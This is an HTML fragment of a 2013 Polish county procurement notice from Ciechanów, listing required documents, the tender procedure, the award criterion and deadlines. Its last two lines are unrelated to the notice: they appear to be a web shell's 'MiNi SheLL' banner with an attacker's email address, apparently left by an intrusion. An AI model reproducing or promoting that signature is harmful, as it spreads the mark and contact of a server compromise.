<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jak w pkt. I.1).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.07.2013 godzina 09:00, miejsce: Starostwo Powiatowe w Ciechanowie, ul. 17 Stycznia 7, 06-400 Ciechanów, pokój 108.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com